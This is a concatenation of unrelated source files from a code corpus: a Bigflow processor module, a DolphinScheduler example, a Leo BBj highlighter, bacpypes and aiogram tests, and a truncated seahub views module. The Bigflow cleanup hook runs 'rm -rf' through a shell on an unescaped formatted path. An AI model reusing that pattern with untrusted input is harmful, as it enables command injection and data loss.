""" return child class name """
return type(self).__name__
def get_entity_config(self):
"""
Get entity_config of this entity
"""
return ""
class PythonEnvironment(SelfNamedEntityBase):
pass
class Processor(EntitiedBySelf):
def __init__(self, *fns):
self.__fns = fns
self.__normal_input_num = 1
self.__config = None
self.__side_inputs = []
def normal_input_num(self, n = None):
if n is None:
return self.__normal_input_num
self.__normal_input_num = n
def set_config(self, config):
self.__config = config
def get_entity_config(self):
from bigflow_python.proto import processor_pb2
processor = processor_pb2.PbPythonProcessorConfig()
if self.__config is not None:
processor.config = cloudpickle.dumps(self.__config)
for fn in self.__fns:
fn = Functor.of(fn)
processor.functor.add().CopyFrom(fn.to_proto_message())
for side_input in self.__side_inputs:
side_input_type = processor_pb2.POBJECT_TYPE
if isinstance(side_input, pcollection.PCollection):
side_input_type = processor_pb2.PCOLLECTION_TYPE
processor.side_input_type.append(side_input_type)
return processor.SerializeToString()
def get_entity_name(self):
return type(self).__name__
def set_side_inputs(self, *side_inputs):
self.__side_inputs = side_inputs
return self
class FlatMapProcessor(Processor):
def __init__(self, fn):
fn = Functor.of(fn)
fn.expect_iterable()
super(FlatMapProcessor, self).__init__(fn)
class FilterProcessor(Processor):
def __init__(self, fn, *side_inputs):
fn = Functor.of(fn)
super(FilterProcessor, self).__init__(fn)
self.set_side_inputs(*side_inputs)
class MapProcessor(Processor):
def __init__(self, fn):
fn = Functor.of(fn)
super(MapProcessor, self).__init__(fn)
def get_entity_name(self):
return "FlatMapProcessor"
class CombineProcessor(Processor):
def __init__(self, fn):
super(CombineProcessor, self).__init__(fn)
self.normal_input_num(0)
class ReduceProcessor(Processor):
def __init__(self, fn):
super(ReduceProcessor, self).__init__(fn)
class AccumulateProcessor(Processor):
def __init__(self, zero_fn, accumulate_fn):
super(AccumulateProcessor, self).__init__(zero_fn, accumulate_fn)
class CountProcessor(Processor):
def __init__(self):
super(CountProcessor, self).__init__()
class SumProcessor(Processor):
def __init__(self):
super(SumProcessor, self).__init__()
class TakeProcessor(Processor):
def __init__(self, n):
if isinstance(n, pobject.PObject):
super(TakeProcessor, self).__init__()
self.set_side_inputs(n)
else:
super(TakeProcessor, self).__init__()
self.set_config(n)
class SelectElementsProcessor(Processor):
def __init__(self, n, order, key_fn = None):
if key_fn is None:
super(SelectElementsProcessor, self).__init__()
else:
super(SelectElementsProcessor, self).__init__(key_fn)
d = {}
if isinstance(n, pobject.PObject):
self.set_side_inputs(n)
d["num"] = -1
else:
d["num"] = n
d["order"] = order
self.set_config(d)
class TransformProcessor(Processor):
def __init__(self, status_serde, initialize_fn, transform_fn, finalize_fn):
msg = Entity.of(Entity.objector, status_serde).to_proto_message()
super(TransformProcessor, self).__init__(initialize_fn, transform_fn, finalize_fn)
self.set_config(msg.SerializeToString())
class FlattenProcessor(Processor):
def __init__(self, serde):
msg = Entity.of(Entity.objector, serde).to_proto_message()
super(FlattenProcessor, self).__init__()
#print len(msg.SerializeToString())
self.set_config(msg.SerializeToString())
class GetLastKeyProcessor(Processor):
def __init__(self, deserialize_fn):
super(GetLastKeyProcessor, self).__init__(deserialize_fn)
class ValueProcessor(Processor):
def __init__(self, fn):
if fn is None:
fn = ExtractValueFn()
fn = Functor.of(fn)
super(ValueProcessor, self).__init__(fn)
def get_entity_name(self):
return "FlatMapProcessor"
class PipeProcessor(Processor):
""" PipeProcessor """
def __init__(self, command, **kargs):
super(PipeProcessor, self).__init__()
config = dict()
config['is_nested_ptype'] = kargs.get('is_nested_ptype', False)
config['command'] = command
# default buffer size 64M
config['buffer_size'] = kargs.get('buffer_size', 64 * 1024 * 1024)
config['type'] = kargs.get('type', 'streaming')
config['field_delimiter'] = kargs.get('field_delimiter', '\t')
config['line_delimiter'] = kargs.get('line_delimiter', '\n')
config['input_fields_num'] = kargs.get('input_fields_num', 1)
config['output_fields_num'] = kargs.get('output_fields_num', 1)
self.set_config(config)
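# A hypothetical construction sketch for PipeProcessor (not part of the original module);
# the keyword names simply mirror the config keys read above:
#
#   proc = PipeProcessor("awk '{print $1}'",
#                        type='streaming',
#                        buffer_size=8 * 1024 * 1024,
#                        field_delimiter='\t',
#                        input_fields_num=2,
#                        output_fields_num=1)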
class BarshalObjector(EntitiedBySelf):
""" BarshalObjector """
def get_entity_name(self):
""" get name """
return "BarshalObjector"
def get_entity_config(self):
""" get config """
return ''
class SplitStringToTypes(CppFunctor):
def __init__(self, sep, fields_type, ignore_overflow, ignore_illegal_line):
"""
接受一行python字符串, 分割符号,每列对应的python类型
将字符串按分隔符分割,并将每一列转化为对应的python类型
Args:
seq: Python string, 分割符
fields_type: Python type, 每列对应的python类型
ignore_overflow: Python boolean, 是否允许文件列数多于字段数
ignore_illegal_line: Python boolean, 是否允许文件列数小于字段数时忽略该行
"""
self._sep = sep
self._fields_type = fields_type
self._ignore_overflow = ignore_overflow
self._ignore_illegal_line = ignore_illegal_line
def config(self):
""" Config: Pass sep, fields_type arguments to cpp runtime"""
return cloudpickle.dumps((self._sep, self._fields_type,
self._ignore_overflow, self._ignore_illegal_line))
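# A hedged usage sketch for SplitStringToTypes (assumed field types; not part of the original module):
#
#   fn = SplitStringToTypes(sep='\t',
#                           fields_type=[int, str, float],
#                           ignore_overflow=True,
#                           ignore_illegal_line=False)
#   # fn.config() pickles the four arguments so the C++ runtime can do the split and conversion.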
class SerdeWrapper(CppFunctor):
"""SerdeWrapper"""
def __init__(self, objector, is_serialize=True, apply_tuple_index=-1):
self._is_serialize = is_serialize
self._objector = objector
self._apply_index = apply_tuple_index
def config(self):
"""Config: Pass serialized arguments to cpp runtime"""
return cloudpickle.dumps((self._is_serialize, self._objector, self._apply_index))
class KVDeserializeFn(CppFunctor):
"""Deserialize function for (Key, Value"""
def __init__(self, *deserializers):
self.deserializers = deserializers
def config(self):
"""Pass deserializers to cpp runtime"""
return cloudpickle.dumps(self.deserializers)
class KVSerializeFn(CppFunctor):
"""serialize function for (Key, Value"""
def __init__(self, *serializers):
self.serializers = serializers
def config(self):
"""Pass serializers to cpp runtime"""
return cloudpickle.dumps(self.serializers)
# please add normal code before following code
def clear_folder(name):
    """Clear the folder if it exists and re-create it empty."""
    logger.debug("deleting folder %s." % name)
    subprocess.call("command rm -rf %s" % name, shell=True)
    subprocess.check_call("command mkdir %s" % name, shell=True)
# when python exits, folder will be deleted
atexit.register(clear_folder, ENTITY_FOLDER)
# EOF
|
dolphinscheduler-python/pydolphinscheduler/examples/task_dependent_example.py
|
swg-liuge/dolphinscheduler
| 2,086 |
78892
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
r"""
A example workflow for task dependent.
This example will create two workflows named `task_dependent` and `task_dependent_external`.
`task_dependent` is true workflow define and run task dependent, while `task_dependent_external`
define outside workflow and task from dependent.
After this script submit, we would get workflow as below:
task_dependent_external:
task_1
task_2
task_3
task_dependent:
task_dependent(this task dependent on task_dependent_external.task_1 and task_dependent_external.task_2).
"""
from pydolphinscheduler.constants import ProcessDefinitionDefault
from pydolphinscheduler.core.process_definition import ProcessDefinition
from pydolphinscheduler.tasks.dependent import And, Dependent, DependentItem, Or
from pydolphinscheduler.tasks.shell import Shell
with ProcessDefinition(
name="task_dependent_external",
tenant="tenant_exists",
) as pd:
task_1 = Shell(name="task_1", command="echo task 1")
task_2 = Shell(name="task_2", command="echo task 2")
task_3 = Shell(name="task_3", command="echo task 3")
pd.submit()
with ProcessDefinition(
name="task_dependent_example",
tenant="tenant_exists",
) as pd:
task = Dependent(
name="task_dependent",
dependence=And(
Or(
DependentItem(
project_name=ProcessDefinitionDefault.PROJECT,
process_definition_name="task_dependent_external",
dependent_task_name="task_1",
),
DependentItem(
project_name=ProcessDefinitionDefault.PROJECT,
process_definition_name="task_dependent_external",
dependent_task_name="task_2",
),
)
),
)
pd.submit()
|
leo/modes/bbj.py
|
ATikhonov2/leo-editor
| 1,550 |
78916
|
<gh_stars>1000+
# Leo colorizer control file for bbj mode.
# This file is in the public domain.
# Properties for bbj mode.
properties = {
"commentEnd": "*/",
"commentStart": "/*",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for bbj_main ruleset.
bbj_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for bbj mode.
attributesDictDict = {
"bbj_main": bbj_main_attributes_dict,
}
# Keywords dict for bbj_main ruleset.
bbj_main_keywords_dict = {
"abs": "keyword1",
"addr": "keyword3",
"adjn": "keyword1",
"all": "keyword3",
"argc": "keyword1",
"argv": "keyword1",
"asc": "keyword1",
"ath": "keyword1",
"atn": "keyword1",
"auto": "keyword3",
"background": "keyword1",
"begin": "keyword3",
"bin": "keyword1",
"break": "keyword3",
"bsz": "keyword1",
"call": "keyword3",
"callback": "keyword1",
"case": "keyword3",
"chanopt": "keyword1",
"chdir": "keyword2",
"chn": "keyword3",
"chr": "keyword1",
"cisam": "keyword2",
"clear": "keyword3",
"clipclear": "keyword1",
"clipfromfile": "keyword1",
"clipfromstr": "keyword1",
"clipisformat": "keyword1",
"cliplock": "keyword1",
"clipregformat": "keyword1",
"cliptofile": "keyword1",
"cliptostr": "keyword1",
"clipunlock": "keyword1",
"close": "keyword2",
"continue": "keyword2",
"cos": "keyword1",
"cpl": "keyword1",
"crc": "keyword1",
"crc16": "keyword1",
"ctl": "keyword3",
"ctrl": "keyword1",
"cvs": "keyword1",
"cvt": "keyword1",
"data": "keyword3",
"date": "keyword1",
"day": "keyword3",
"dec": "keyword1",
"def": "keyword3",
"default": "keyword3",
"defend": "keyword3",
"delete": "keyword3",
"dim": "keyword3",
"dims": "keyword1",
"dir": "keyword2",
"direct": "keyword2",
"disable": "keyword2",
"dom": "keyword2",
"dread": "keyword3",
"drop": "keyword3",
"dsk": "keyword1",
"dsz": "keyword1",
"dump": "keyword2",
"edit": "keyword3",
"else": "keyword3",
"enable": "keyword2",
"end": "keyword2",
"endif": "keyword3",
"endtrace": "keyword2",
"enter": "keyword3",
"ept": "keyword1",
"erase": "keyword2",
"err": "keyword3",
"errmes": "keyword1",
"escape": "keyword3",
"escoff": "keyword3",
"escon": "keyword3",
"execute": "keyword3",
"exit": "keyword3",
"exitto": "keyword3",
"extract": "keyword2",
"fattr": "keyword1",
"fbin": "keyword1",
"fdec": "keyword1",
"fi": "keyword3",
"fid": "keyword2",
"field": "keyword1",
"file": "keyword2",
"fileopt": "keyword1",
"fill": "keyword1",
"fin": "keyword2",
"find": "keyword2",
"floatingpoint": "keyword1",
"for": "keyword3",
"fpt": "keyword1",
"from": "keyword2",
"gap": "keyword1",
"gosub": "keyword3",
"goto": "keyword3",
"hsa": "keyword1",
"hsh": "keyword1",
"hta": "keyword1",
"if": "keyword3",
"iff": "keyword3",
"imp": "keyword1",
"ind": "keyword2",
"indexed": "keyword2",
"info": "keyword1",
"initfile": "keyword3",
"input": "keyword2",
"inpute": "keyword2",
"inputn": "keyword2",
"int": "keyword1",
"iol": "keyword2",
"iolist": "keyword2",
"ior": "keyword3",
"jul": "keyword1",
"key": "keyword2",
"keyf": "keyword2",
"keyl": "keyword2",
"keyn": "keyword2",
"keyp": "keyword2",
"kgen": "keyword2",
"knum": "keyword2",
"lcheckin": "keyword1",
"lcheckout": "keyword1",
"len": "keyword1",
"let": "keyword3",
"linfo": "keyword1",
"list": "keyword2",
"load": "keyword2",
"lock": "keyword2",
"log": "keyword1",
"lrc": "keyword1",
"lst": "keyword1",
"mask": "keyword1",
"max": "keyword1",
"menuinfo": "keyword1",
"merge": "keyword2",
"min": "keyword1",
"mkdir": "keyword2",
"mkeyed": "keyword2",
"mod": "keyword1",
"msgbox": "keyword1",
"neval": "keyword1",
"next": "keyword3",
"nfield": "keyword1",
"not": "keyword3",
"notice": "keyword1",
"noticetpl": "keyword1",
"num": "keyword1",
"on": "keyword3",
"open": "keyword2",
"opts": "keyword3",
"or": "keyword3",
"pad": "keyword1",
"pck": "keyword1",
"pfx": "keyword3",
"pgm": "keyword1",
"pos": "keyword1",
"precision": "keyword3",
"prefix": "keyword2",
"print": "keyword2",
"process_events": "keyword1",
"program": "keyword1",
"psz": "keyword1",
"pub": "keyword1",
"read": "keyword2",
"read_resource": "keyword2",
"record": "keyword2",
"release": "keyword3",
"remove": "keyword2",
"remove_callback": "keyword1",
"rename": "keyword2",
"renum": "keyword3",
"repeat": "keyword3",
"resclose": "keyword2",
"reserve": "keyword1",
"reset": "keyword3",
"resfirst": "keyword2",
"resget": "keyword2",
"resinfo": "keyword2",
"resnext": "keyword2",
"resopen": "keyword2",
"restore": "keyword3",
"retry": "keyword3",
"return": "keyword3",
"rev": "keyword2",
"rmdir": "keyword2",
"rnd": "keyword1",
"round": "keyword1",
"run": "keyword3",
"save": "keyword2",
"scall": "keyword1",
"select": "keyword2",
"sendmsg": "keyword1",
"serial": "keyword2",
"set_case_sensitive_off": "keyword3",
"set_case_sensitive_on": "keyword3",
"setday": "keyword2",
"setdrive": "keyword2",
"seterr": "keyword3",
"setesc": "keyword3",
"setopts": "keyword3",
"settime": "keyword3",
"settrace": "keyword2",
"seval": "keyword1",
"sgn": "keyword1",
"sin": "keyword1",
"siz": "keyword2",
"sort": "keyword2",
"sqlchn": "keyword2",
"sqlclose": "keyword2",
"sqlerr": "keyword2",
"sqlexec": "keyword2",
"sqlfetch": "keyword2",
"sqllist": "keyword2",
"sqlopen": "keyword2",
"sqlprep": "keyword2",
"sqlset": "keyword2",
"sqltables": "keyword2",
"sqltmpl": "keyword2",
"sqlunt": "keyword2",
"sqr": "keyword1",
"ssn": "keyword3",
"ssort": "keyword1",
"ssz": "keyword1",
"start": "keyword3",
"stbl": "keyword1",
"step": "keyword3",
"stop": "keyword3",
"str": "keyword1",
"string": "keyword2",
"swap": "keyword1",
"swend": "keyword3",
"switch": "keyword3",
"sys": "keyword1",
"table": "keyword2",
"tbl": "keyword2",
"tcb": "keyword1",
"then": "keyword3",
"tim": "keyword2",
"tmpl": "keyword1",
"to": "keyword3",
"tsk": "keyword1",
"unlock": "keyword2",
"unt": "keyword3",
"until": "keyword3",
"upk": "keyword1",
"wait": "keyword3",
"wend": "keyword3",
"where": "keyword2",
"while": "keyword3",
"winfirst": "keyword1",
"wininfo": "keyword1",
"winnext": "keyword1",
"write": "keyword2",
"xfid": "keyword2",
"xfile": "keyword2",
"xfin": "keyword2",
"xor": "keyword3",
}
# Dictionary of keywords dictionaries for bbj mode.
keywordsDictDict = {
"bbj_main": bbj_main_keywords_dict,
}
# Rules for bbj_main ruleset.
def bbj_rule0(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="/*", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def bbj_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def bbj_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="//",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def bbj_rule3(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="REM",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def bbj_rule4(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule5(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule6(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule7(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule8(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule9(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule10(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule11(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule12(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule13(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<>",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="and",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="or",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule17(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="label", pattern=":",
at_line_start=True, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def bbj_rule18(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def bbj_rule19(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for bbj_main ruleset.
rulesDict1 = {
"\"": [bbj_rule1,],
"(": [bbj_rule18,],
"*": [bbj_rule10,],
"+": [bbj_rule7,],
"-": [bbj_rule8,],
"/": [bbj_rule0,bbj_rule2,bbj_rule9,],
"0": [bbj_rule19,],
"1": [bbj_rule19,],
"2": [bbj_rule19,],
"3": [bbj_rule19,],
"4": [bbj_rule19,],
"5": [bbj_rule19,],
"6": [bbj_rule19,],
"7": [bbj_rule19,],
"8": [bbj_rule19,],
"9": [bbj_rule19,],
":": [bbj_rule17,],
"<": [bbj_rule6,bbj_rule12,bbj_rule13,],
"=": [bbj_rule4,],
">": [bbj_rule5,bbj_rule11,],
"@": [bbj_rule19,],
"A": [bbj_rule19,],
"B": [bbj_rule19,],
"C": [bbj_rule19,],
"D": [bbj_rule19,],
"E": [bbj_rule19,],
"F": [bbj_rule19,],
"G": [bbj_rule19,],
"H": [bbj_rule19,],
"I": [bbj_rule19,],
"J": [bbj_rule19,],
"K": [bbj_rule19,],
"L": [bbj_rule19,],
"M": [bbj_rule19,],
"N": [bbj_rule19,],
"O": [bbj_rule19,],
"P": [bbj_rule19,],
"Q": [bbj_rule19,],
"R": [bbj_rule3,bbj_rule19,],
"S": [bbj_rule19,],
"T": [bbj_rule19,],
"U": [bbj_rule19,],
"V": [bbj_rule19,],
"W": [bbj_rule19,],
"X": [bbj_rule19,],
"Y": [bbj_rule19,],
"Z": [bbj_rule19,],
"^": [bbj_rule14,],
"_": [bbj_rule19,],
"a": [bbj_rule15,bbj_rule19,],
"b": [bbj_rule19,],
"c": [bbj_rule19,],
"d": [bbj_rule19,],
"e": [bbj_rule19,],
"f": [bbj_rule19,],
"g": [bbj_rule19,],
"h": [bbj_rule19,],
"i": [bbj_rule19,],
"j": [bbj_rule19,],
"k": [bbj_rule19,],
"l": [bbj_rule19,],
"m": [bbj_rule19,],
"n": [bbj_rule19,],
"o": [bbj_rule16,bbj_rule19,],
"p": [bbj_rule19,],
"q": [bbj_rule19,],
"r": [bbj_rule19,],
"s": [bbj_rule19,],
"t": [bbj_rule19,],
"u": [bbj_rule19,],
"v": [bbj_rule19,],
"w": [bbj_rule19,],
"x": [bbj_rule19,],
"y": [bbj_rule19,],
"z": [bbj_rule19,],
}
# x.rulesDictDict for bbj mode.
rulesDictDict = {
"bbj_main": rulesDict1,
}
# Import dict for bbj mode.
importDict = {}
|
tests/test_network/test_net_2.py
|
amih90/bacpypes
| 240 |
78929
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Network Discovery
----------------------
The TD is on network 1 with sniffer1, network 2 has sniffer2, and network 3 has
sniffer3. Networks 1 and 2 are connected by one router; networks 2 and 3
are connected by a different router.
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, btox, xtob
from bacpypes.comm import Client, Server, bind
from bacpypes.pdu import PDU, Address, LocalBroadcast
from bacpypes.vlan import Network
from bacpypes.npdu import (
npdu_types, NPDU,
WhoIsRouterToNetwork, IAmRouterToNetwork, ICouldBeRouterToNetwork,
RejectMessageToNetwork, RouterBusyToNetwork, RouterAvailableToNetwork,
RoutingTableEntry, InitializeRoutingTable, InitializeRoutingTableAck,
EstablishConnectionToNetwork, DisconnectConnectionToNetwork,
WhatIsNetworkNumber, NetworkNumberIs,
)
from ..state_machine import match_pdu, StateMachineGroup, TrafficLog
from ..time_machine import reset_time_machine, run_time_machine
from .helpers import SnifferStateMachine, NetworkLayerStateMachine, RouterNode
# some debugging
_debug = 0
_log = ModuleLogger(globals())
#
# TNetwork
#
@bacpypes_debugging
class TNetwork(StateMachineGroup):
def __init__(self):
if _debug: TNetwork._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.td)
# sniffer node
self.sniffer1 = SnifferStateMachine("2", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("3", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# sniffer node
self.sniffer2 = SnifferStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, 2)
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = SnifferStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
def run(self, time_limit=60.0):
if _debug: TNetwork._debug("run %r", time_limit)
# run the group
super(TNetwork, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork._debug(" %s %s", direction, str(pdu))
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork._debug)
# check for success
all_success, some_failed = super(TNetwork, self).check_for_success()
assert all_success
@bacpypes_debugging
class TestSimple(unittest.TestCase):
def test_idle(self):
"""Test an idle network, nothing happens is success."""
if _debug: TestSimple._debug("test_idle")
# create a network
tnet = TNetwork()
# all start states are successful
tnet.td.start_state.success()
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
@bacpypes_debugging
class TestWhoIsRouterToNetwork(unittest.TestCase):
def test_01(self):
"""Test broadcast for any router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_01")
# create a network
tnet = TNetwork()
# test device sends request, sees response
tnet.td.start_state.doc("1-1-0") \
.send(WhoIsRouterToNetwork(
destination=LocalBroadcast(),
)).doc("1-1-1") \
.receive(IAmRouterToNetwork,
iartnNetworkList=[2],
).doc("1-1-2") \
.success()
# sniffer on network 1 sees the request and the response
tnet.sniffer1.start_state.doc("1-2-0") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'00' # message type, no network
)
).doc("1-2-1") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'01 0002' # message type and network list
)
).doc("1-2-2") \
.success()
# nothing received on network 2
tnet.sniffer2.start_state.doc("1-3-0") \
.timeout(3).doc("1-3-1") \
.success()
# nothing received on network 3
tnet.sniffer3.start_state.doc("1-4-0") \
.timeout(3).doc("1-4-1") \
.success()
# run the group
tnet.run()
def test_02(self):
"""Test broadcast for existing router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_02")
# create a network
tnet = TNetwork()
# test device sends request, receives response
tnet.td.start_state.doc("2-1-0") \
.send(WhoIsRouterToNetwork(2,
destination=LocalBroadcast(),
)).doc("2-1-1") \
.receive(IAmRouterToNetwork,
iartnNetworkList=[2],
).doc("2-1-2") \
.success()
tnet.sniffer1.start_state.success()
# nothing received on network 2
tnet.sniffer2.start_state.doc("2-2-0") \
.timeout(3).doc("2-2-1") \
.success()
# nothing received on network 3
tnet.sniffer3.start_state.doc("2-3-0") \
.timeout(3).doc("2-3-1") \
.success()
# run the group
tnet.run()
def test_03(self):
"""Test broadcast for a non-existent router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_03")
# create a network
tnet = TNetwork()
# send request, receive nothing back
tnet.td.start_state.doc("3-1-0") \
.send(WhoIsRouterToNetwork(4,
destination=LocalBroadcast(),
)).doc("3-1-1") \
.timeout(3).doc("3-1-2") \
.success()
# sniffer on network 1 sees the request
tnet.sniffer1.start_state.doc("3-2-0") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'00 0004' # message type and network
)
).doc("3-2-1") \
.success()
# sniffer on network 2 sees request forwarded by router
tnet.sniffer2.start_state.doc("3-3-0") \
.receive(PDU,
pduData=xtob('01.88' # version, network layer, routed
'0001 01 01' # snet/slen/sadr
'00 0004' # message type and network
),
).doc("3-3-1") \
.success()
tnet.sniffer3.start_state.doc("3-4-0") \
.receive(PDU,
pduData=xtob('01.88' # version, network layer, routed
'0001 01 01' # snet/slen/sadr
'00 0004' # message type and network
),
).doc("3-4-1") \
.success()
# run the group
tnet.run()
|
tests/types/test_photo.py
|
andrew-ld/aiogram
| 2,744 |
78935
|
from aiogram import types
from .dataset import PHOTO
photo = types.PhotoSize(**PHOTO)
def test_export():
exported = photo.to_python()
assert isinstance(exported, dict)
assert exported == PHOTO
def test_file_id():
assert isinstance(photo.file_id, str)
assert photo.file_id == PHOTO['file_id']
def test_file_size():
assert isinstance(photo.file_size, int)
assert photo.file_size == PHOTO['file_size']
def test_size():
assert isinstance(photo.width, int)
assert isinstance(photo.height, int)
assert photo.width == PHOTO['width']
assert photo.height == PHOTO['height']
|
doc/workshop/advancedReliability/inputs/goalFunction.py
|
rinelson456/raven
| 159 |
78937
|
<reponame>rinelson456/raven
def __residuumSign(self):
if self.outcome == 0:
return -1
else: return 1
|
seahub/organizations/views.py
|
samuelduann/seahub
| 420 |
78980
|
# Copyright (c) 2012-2016 Seafile Ltd.
# encoding: utf-8
import logging
import json
from urllib.parse import urlparse
from django.conf import settings
from django.contrib import messages
from django.urls import reverse
from django.core.cache import cache
from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render
from django.utils.crypto import get_random_string
import seaserv
from seaserv import ccnet_api
from seahub.auth import login
from seahub.auth.decorators import login_required, login_required_ajax
from seahub.base.accounts import User
from seahub.group.views import remove_group_common
from seahub.profile.models import Profile
from seahub.utils import get_service_url, render_error
from seahub.utils.auth import get_login_bg_image_path
from seahub.organizations.signals import org_created
from seahub.organizations.decorators import org_staff_required
from seahub.organizations.forms import OrgRegistrationForm
from seahub.organizations.settings import ORG_AUTO_URL_PREFIX, \
ORG_MEMBER_QUOTA_ENABLED, ORG_ENABLE_ADMIN_INVITE_USER
from seahub.organizations.utils import get_or_create_invitation_link
# Get an instance of a logger
logger = logging.getLogger(__name__)
########## ccnet rpc wrapper
def create_org(org_name, url_prefix, creator):
return seaserv.create_org(org_name, url_prefix, creator)
def count_orgs():
return seaserv.ccnet_threaded_rpc.count_orgs()
def get_org_by_url_prefix(url_prefix):
return seaserv.ccnet_threaded_rpc.get_org_by_url_prefix(url_prefix)
def set_org_user(org_id, username, is_staff=False):
return seaserv.ccnet_threaded_rpc.add_org_user(org_id, username,
int(is_staff))
def unset_org_user(org_id, username):
return seaserv.ccnet_threaded_rpc.remove_org_user(org_id, username)
def org_user_exists(org_id, username):
return seaserv.ccnet_threaded_rpc.org_user_exists(org_id, username)
def get_org_groups(org_id, start, limit):
return seaserv.ccnet_threaded_rpc.get_org_groups(org_id, start, limit)
def get_org_id_by_group(group_id):
return seaserv.ccnet_threaded_rpc.get_org_id_by_group(group_id)
def remove_org_group(org_id, group_id, username):
remove_group_common(group_id, username)
seaserv.ccnet_threaded_rpc.remove_org_group(org_id, group_id)
def is_org_staff(org_id, username):
return seaserv.ccnet_threaded_rpc.is_org_staff(org_id, username)
def set_org_staff(org_id, username):
return seaserv.ccnet_threaded_rpc.set_org_staff(org_id, username)
def unset_org_staff(org_id, username):
